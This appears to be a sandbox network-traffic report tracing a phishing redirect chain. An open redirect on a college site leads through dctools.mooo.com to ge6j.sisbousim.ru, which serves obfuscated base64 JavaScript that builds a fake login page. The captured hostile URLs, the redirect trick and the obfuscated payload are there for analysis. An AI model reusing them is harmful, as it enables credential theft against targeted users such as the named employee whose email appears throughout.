                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: fs.microsoft.com
                                                                              2024-10-03 01:13:33 UTC514INHTTP/1.1 200 OK
                                                                              ApiVersion: Distribute 1.1
                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                              Server: ECAcc (lpl/EF06)
                                                                              X-CID: 11
                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                              X-Ms-Region: prod-weu-z1
                                                                              Cache-Control: public, max-age=55881
                                                                              Date: Thu, 03 Oct 2024 01:13:33 GMT
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              X-CID: 2
                                                                              2024-10-03 01:13:33 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.44974323.217.172.1854431908C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:39 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                              Host: armmf.adobe.com
                                                                              Connection: keep-alive
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              If-None-Match: "78-5faa31cce96da"
                                                                              If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                              2024-10-03 01:13:39 UTC198INHTTP/1.1 304 Not Modified
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                              ETag: "78-5faa31cce96da"
                                                                              Date: Thu, 03 Oct 2024 01:13:39 GMT
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.4497424.175.87.197443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:39 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Xc14Vl+MOHmbebK&MD=R+GozY2U HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-10-03 01:13:39 UTC560INHTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                              MS-CorrelationId: 1202e4fd-b487-41ae-a446-8586946d09e2
                                                                              MS-RequestId: 906ac63e-a212-4bc4-959a-9801f3ad3d3f
                                                                              MS-CV: RoguLINESk+q1S2r.0
                                                                              X-Microsoft-SLSClientCache: 2880
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 03 Oct 2024 01:13:39 GMT
                                                                              Connection: close
                                                                              Content-Length: 24490
                                                                              2024-10-03 01:13:39 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                              2024-10-03 01:13:39 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449754104.18.246.1414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:52 UTC845OUTGET /cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=6987&ListingID=7469&CategoryID=637&SubCategoryID=0&url=//dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com HTTP/1.1
                                                                              Host: web.nvcc.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:52 UTC545INHTTP/1.1 302 Found
                                                                              Date: Thu, 03 Oct 2024 01:13:52 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: private
                                                                              location: //dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com
                                                                              x-aspnet-version: 4.0.30319
                                                                              set-cookie: ASP.NET_SessionId=; path=/; secure; HttpOnly
                                                                              x-powered-by: ASP.NET
                                                                              x-frame-options: sameorigin
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc91276291bde95-EWR
                                                                              2024-10-03 01:13:52 UTC198INData Raw: 63 30 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 2f 64 63 74 6f 6f 6c 73 2e 6d 6f 6f 6f 2e 63 6f 6d 2f 73 6d 69 6c 65 79 65 73 2f 6c 6f 67 69 6e 2f 71 77 65 72 74 79 2f 6c 61 6e 63 65 2e 6b 6f 79 61 6e 61 67 69 40 67 6c 6f 62 61 6c 66 6f 75 6e 64 72 69 65 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                              Data Ascii: c0<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="//dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com">here</a>.</h2></body></html>
                                                                              2024-10-03 01:13:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449755192.185.163.424438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:53 UTC715OUTGET /smileyes/login/qwerty/lance.koyanagi@globalfoundries.com HTTP/1.1
                                                                              Host: dctools.mooo.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:53 UTC263INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:53 GMT
                                                                              Server: Apache
                                                                              refresh: 0;url=https://Ge6j.sisbousim.ru/jREPXBM/#klance.koyanagi@globalfoundries.com
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449756192.185.163.424438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:54 UTC644OUTGET /favicon.ico HTTP/1.1
                                                                              Host: dctools.mooo.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:54 UTC176INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:54 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449761188.114.96.34438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:54 UTC690OUTGET /jREPXBM/ HTTP/1.1
                                                                              Host: ge6j.sisbousim.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Referer: https://dctools.mooo.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:55 UTC1041INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: no-cache, private
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQIpVvm4wq0nttUVHljrLPJFCfpxDJnFzCd85a96gJsxwRuSfqkl2OtGKPBTgxc4%2BfLlApbHO4FJnfRIzzsYvMxP%2B6kVJAO1Dsdn1HJG7sISodYd7TMDHHDa3%2FR8ZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IkFRS296M3hNM29JeEl3UGhlaXJtdmc9PSIsInZhbHVlIjoiUENjUG1BNVc4bEN4TGhzeDM3cW9YSXp5ZVhkL1daZStoQ0lDOTRMTWxlZ1BwNzJ4N1NBRU9waklUYU5XazhOQmRxZWptNUZXUkowZ04yUUdVTnFCZC9VcWx5Z0RGWm5qTUdIWnBVMnhEVDgrU3BzWXdvNXJBQzFMdUNuazJuamMiLCJtYWMiOiJhNmFkOTU3MWFhZTIxOTE4OWYyM2Y1MzBlNWU3YTU3ZWEwZTE1OTIyNWQzMDM2MTg4ZGYxMDcwODZlMDExMTZlIiwidGFnIjoiIn0%3D; expires=Thu, 03-Oct-2024 03:13:55 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                              2024-10-03 01:13:55 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 46 34 54 46 42 6c 5a 55 46 77 64 30 56 69 4d 6a 4e 79 54 45 67 35 4d 7a 5a 4b 63 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 6b 31 78 62 6e 4a 50 4f 55 34 77 52 32 39 43 53 31 68 79 4e 32 56 54 62 33 46 4b 51 54 46 7a 55 57 67 76 5a 43 74 30 65 45 51 77 57 6c 52 56 63 6a 6c 44 59 32 73 32 54 47 4e 55 63 32 52 78 54 6a 42 36 63 54 56 35 57 44 46 30 62 6d 30 76 53 7a 56 74 4c 30 68 54 59 57 46 71 62 58 6f 76 62 6e 52 75 54 32 6b 33 4f 55 38 34 56 57 35 6f 4f 58 70 33 61 32 70 45 53 6a 52 42 63 6d 4a 61 62 33 52 4e 61 47 63 30 4e 47 51 34 51 6b 5a 53 53 30 4a 6b 61 44 6c 7a 4d 48 42 4d 52 46 46 68 53 48 41 34 52 6b 4a 5a 64 32 6b
                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InF4TFBlZUFwd0ViMjNyTEg5MzZKc2c9PSIsInZhbHVlIjoiak1xbnJPOU4wR29CS1hyN2VTb3FKQTFzUWgvZCt0eEQwWlRVcjlDY2s2TGNUc2RxTjB6cTV5WDF0bm0vSzVtL0hTYWFqbXovbnRuT2k3OU84VW5oOXp3a2pESjRBcmJab3RNaGc0NGQ4QkZSS0JkaDlzMHBMRFFhSHA4RkJZd2k
                                                                              2024-10-03 01:13:55 UTC1179INData Raw: 34 34 35 36 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 69 66 28 22 68 74 74 70 73 3a 2f 2f 47 65 36 6a 2e 73 69 73 62 6f 75 73 69 6d 2e 72 75 2f 6a 52 45 50 58 42 4d 2f 22 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71
                                                                              Data Ascii: 4456<script>if("https://Ge6j.sisbousim.ru/jREPXBM/" == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5q
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 61 57 46 42 63 33 70 68 61 30 68 6d 56 43 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 6c 68 51 58 4e 36 59 57 74 49 5a 6c 51 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46
                                                                              Data Ascii: Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojaWFBc3pha0hmVCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2lhQXN6YWtIZlQuY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWF
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 54 30 69 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 49 47 46 79 61 57 46 73 4c 43 42 7a 59 57 35 7a 4c 58 4e 6c 63 6d 6c 6d 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 59 32 39 73 62 33 49 36 49 43 4d 77 4d 44 41 37 63 47 46 6b 5a 47 6c 75 5a 7a 6f 67 4d 6a 42 77 65 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 34 63 48 67 37 62 33 5a 6c 63 6e 4e 6a 63 6d 39 73 62 43 31 69 5a 57 68 68 64 6d 6c 76 63 6a 6f 67 59 32 39 75 64 47 46 70 62 6a 73 69 50 67 30 4b 50 43 45 74 4c 53 42 5a 62 33 55 67 61 32 35 76 64 79 42 35 62 33 55 67 59 58 4a 6c 49 47 39 75 49 48 52 6f 5a 53 42 79 62 32 46 6b 49 48 52 76 49 48 4e 31 59 32 4e 6c 63 33 4d 67 61 57 59 67 65 57 39 31 49 48 64 76 64 57 78 6b 49 47 52 76
                                                                              Data Ascii: T0iZm9udC1mYW1pbHk6IGFyaWFsLCBzYW5zLXNlcmlmO2JhY2tncm91bmQtY29sb3I6ICNmZmY7Y29sb3I6ICMwMDA7cGFkZGluZzogMjBweDtmb250LXNpemU6IDE4cHg7b3ZlcnNjcm9sbC1iZWhhdmlvcjogY29udGFpbjsiPg0KPCEtLSBZb3Uga25vdyB5b3UgYXJlIG9uIHRoZSByb2FkIHRvIHN1Y2Nlc3MgaWYgeW91IHdvdWxkIGRv
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 4e 7a 49 47 6c 7a 49 47 35 76 64 43 42 30 61 47 55 67 61 32 56 35 49 48 52 76 49 47 68 68 63 48 42 70 62 6d 56 7a 63 79 34 67 53 47 46 77 63 47 6c 75 5a 58 4e 7a 49 47 6c 7a 49 48 52 6f 5a 53 42 72 5a 58 6b 67 64 47 38 67 63 33 56 6a 59 32 56 7a 63 79 34 67 53 57 59 67 65 57 39 31 49 47 78 76 64 6d 55 67 64 32 68 68 64 43 42 35 62 33 55 67 59 58 4a 6c 49 47 52 76 61 57 35 6e 4c 43 42 35 62 33 55 67 64 32 6c 73 62 43 42 69 5a 53 42 7a 64 57 4e 6a 5a 58 4e 7a 5a 6e 56 73 4c 6a 77 76 5a 47 6c 32 50 69 41 74 4c 54 34 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6c 68 58 53 6c 70 76 56 6d 4e 46 62 30 55 69 50 67 30 4b 51
                                                                              Data Ascii: NzIGlzIG5vdCB0aGUga2V5IHRvIGhhcHBpbmVzcy4gSGFwcGluZXNzIGlzIHRoZSBrZXkgdG8gc3VjY2Vzcy4gSWYgeW91IGxvdmUgd2hhdCB5b3UgYXJlIGRvaW5nLCB5b3Ugd2lsbCBiZSBzdWNjZXNzZnVsLjwvZGl2PiAtLT4KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IlhXSlpvVmNFb0UiPg0KQ
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 71 54 30 52 53 52 6e 42 6f 5a 55 39 6d 52 46 52 6d 65 57 70 43 51 33 70 43 52 31 4e 47 53 55 35 70 57 6b 64 59 52 55 31 45 57 6b 52 51 56 30 68 47 53 55 4a 5a 53 45 68 61 56 46 42 4b 54 56 42 55 52 6b 31 46 57 45 31 46 53 46 4a 53 54 46 4e 57 54 55 46 56 52 55 64 4f 54 45 6c 4c 57 45 4e 44 53 31 4a 47 4a 79 77 67 65 77 30 4b 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6b 64 46 56 43 49 73 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6e 52 6c 65 48 51 6f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 64 47 56 34 64 43 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 63 32 39 73 5a 53
                                                                              Data Ascii: qT0RSRnBoZU9mRFRmeWpCQ3pCR1NGSU5pWkdYRU1EWkRQV0hGSUJZSEhaVFBKTVBURk1FWE1FSFJSTFNWTUFVRUdOTElLWENDS1JGJywgew0KICAgIG1ldGhvZDogIkdFVCIsDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgcmV0dXJuIHJlc3BvbnNlLnRleHQoKQ0KICAgIH0pLnRoZW4odGV4dCA9PiB7DQogICAgY29uc29sZS
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 0d 0a 7d 0d 0a 69 66 28 22 68 74 74 70 73 3a 2f 2f 47 65 36 6a 2e 73 69 73 62 6f 75 73 69 6d 2e 72 75 2f 6a 52 45 50 58 42 4d 2f 22 20 21 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 63 6f 6e 73 74 20 4d 50 4f 48 46 4d 42 73 59 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 63 6f 6e 73 74 20 6d 66 4f 51 75 48 67 7a 45 53 20 3d 20 6e 65 77 20 55 52 4c 28 22 68 74 74 70 73 3a 2f 2f 47 65 36 6a 2e 73 69 73 62 6f 75 73 69 6d 2e 72 75 2f 6a 52 45 50 58 42 4d 2f 22 29 3b 0d 0a 63 6f 6e 73 74 20 6d 66 6d 4b 4c 54 68 44 69 4d 20 3d 20 6d 66 4f 51 75 48 67 7a 45 53 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 4d 50 4f 48 46 4d
                                                                              Data Ascii: }if("https://Ge6j.sisbousim.ru/jREPXBM/" !== "nomatch"){const MPOHFMBsYf = window.location.hostname.split('.').slice(-2).join('.');const mfOQuHgzES = new URL("https://Ge6j.sisbousim.ru/jREPXBM/");const mfmKLThDiM = mfOQuHgzES.hostname === MPOHFM
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53 42 37 44 51 6f 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 44 51 6f 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 70 59 55 46 7a 65 6d 46 72 53 47 5a 55 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49
                                                                              Data Ascii: U+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNpYUFzemFrSGZUIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI
